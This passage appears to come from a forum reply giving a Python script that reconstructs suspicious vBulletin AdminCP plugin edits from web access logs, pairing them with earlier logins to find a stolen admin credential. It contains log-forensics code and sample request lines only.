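    '72.113.214.199 - - [12/Jul/2010:16:59:59 -0400] "POST /login.php?do=login HTTP/1.1" 302 20 "/admincp/" "%s"' % DROID,
    '72.113.214.199 - - [12/Jul/2010:17:02:21 -0400] "GET /admincp/plugin.php?do=edit&pluginid=320 HTTP/1.1" 200 2360 "-" "%s"' % DROID,
    '72.113.214.199 - - [12/Jul/2010:17:03:41 -0400] "POST /admincp/plugin.php?do=update HTTP/1.1" 200 1709 "/admincp/plugin.php?do=edit&pluginid=320" "%s"' % DROID,
]


def parse_log(lines):
    """Parse combined-log lines; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
            events.append(ev)
    return events


def admin_changes(lines, login_window=timedelta(minutes=30)):
    """One record per state-changing AdminCP POST, with the latest login POST
    from the same IP inside login_window (None if there was none)."""
    events = parse_log(lines)
    out = []
    for ev in events:
        if ev["method"] != "POST" or not ADMIN_WRITE.match(ev["path"]):
            continue
        logins = [e["ts"] for e in events
                  if e["ip"] == ev["ip"] and e["method"] == "POST"
                  and e["path"].startswith(LOGIN_PATH)
                  and timedelta(0) <= ev["ts"] - e["ts"] <= login_window]
        out.append({"ip": ev["ip"], "when": ev["ts"], "path": ev["path"],
                    "ua": ev["ua"], "login_at": max(logins, default=None)})
    return out


def admin_sources(changes):
    """Distinct (ip, user agent) pairs that changed AdminCP state.  In the
    thread a hosting-provider address with desktop Firefox and a mobile
    carrier address with an Android browser edit the same plugin within ten
    hours: a stolen credential in use, not one admin at one desk."""
    return sorted({(c["ip"], c["ua"]) for c in changes})


if __name__ == "__main__":
    for c in admin_changes(SAMPLE_LOG):
        print(c["when"], c["ip"], c["path"], "login at", c["login_at"])
    for ip, ua in admin_sources(admin_changes(SAMPLE_LOG)):
        print(ip, ua)
```

Feed the real access log in as `lines` (one string per line) to get the same pairing; the request that wrote the redirect is the `plugin.php?do=update` POST, so the time on that record is where the file-modification timestamps and the datastore change should line up. The poster's lines carry a "Line NNNN - <ip>" prefix from a log viewer, which would need stripping first.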